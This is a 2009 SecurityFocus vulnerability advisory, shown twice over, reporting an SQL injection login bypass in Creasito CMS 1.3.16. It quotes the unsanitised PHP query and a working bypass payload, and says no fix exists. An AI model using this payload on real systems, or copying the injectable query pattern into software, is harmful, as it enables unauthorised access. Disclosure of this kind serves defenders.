Creasito e-commerce content manager Authentication Bypass Apr 20 2009 03:08PM
Salvatore \drosophila\ Fresta (drosophilaxxx gmail com)
******* Salvatore "drosophila" Fresta *******

[+] Application: creasito e-commerce content manager
[+] Version: 1.3.16
[+] Website: http://creasito.bloghosteria.com

[+] Bugs: [A] Authentication Bypass

[+] Exploitation: Remote
[+] Date: 20 Apr 2009

[+] Discovered by: Salvatore "drosophila" Fresta
[+] Author: Salvatore "drosophila" Fresta
[+] Contact: e-mail: drosophilaxxx (at) gmail (dot) com [email concealed]

*************************************************

[+] Menu

1) Bugs
2) Code
3) Fix

*************************************************

[+] Bugs

This cms is entirely vulnerable to SQL Injection.
I decided to post authentication bypass security
flaw only.

- [A] Authentication Bypass

[-] Risk: medium
[-] Requisites: magic_quotes_gpc = off
[-] File affected: admin/checkuser.php, checkuser.php

SQL Injection bug allows a guest to bypass the
authentication system. The following is the
vulnerable code:

...

$username = $_POST['username'];

...

$sql = mysql_query("SELECT * FROM amministratore WHERE
username='$username' AND password='$password' AND activated='1'");

...

*************************************************

[+] Code

- [A] Authentication Bypass

Username: -1' OR '1'='1'#
Password: foo

*************************************************

[+] Fix

No fix.

*************************************************

--
Salvatore "drosophila" Fresta
CWNP444351
******* Salvatore "drosophila" Fresta *******

[+] Application: creasito e-commerce content manager
[+] Version: 1.3.16
[+] Website: http://creasito.bloghosteria.com

[+] Bugs: [A] Authentication Bypass

[+] Exploitation: Remote
[+] Date: 20 Apr 2009

[+] Discovered by: Salvatore "drosophila" Fresta
[+] Author: Salvatore "drosophila" Fresta
[+] Contact: e-mail: drosophilaxxx (at) gmail (dot) com [email concealed]

*************************************************

[+] Menu

1) Bugs
2) Code
3) Fix

*************************************************

[+] Bugs

This cms is entirely vulnerable to SQL Injection.
I decided to post authentication bypass security
flaw only.

- [A] Authentication Bypass

[-] Risk: medium
[-] Requisites: magic_quotes_gpc = off
[-] File affected: admin/checkuser.php, checkuser.php

SQL Injection bug allows a guest to bypass the
authentication system. The following is the
vulnerable code:

...

$username = $_POST['username'];

...

$sql = mysql_query("SELECT * FROM amministratore WHERE username='$username' AND password='$password' AND activated='1'");

...

*************************************************

[+] Code

- [A] Authentication Bypass

Username: -1' OR '1'='1'#
Password: foo

*************************************************

[+] Fix

No fix.

*************************************************

[ reply ]


 

Privacy Statement
Copyright 2010, SecurityFocus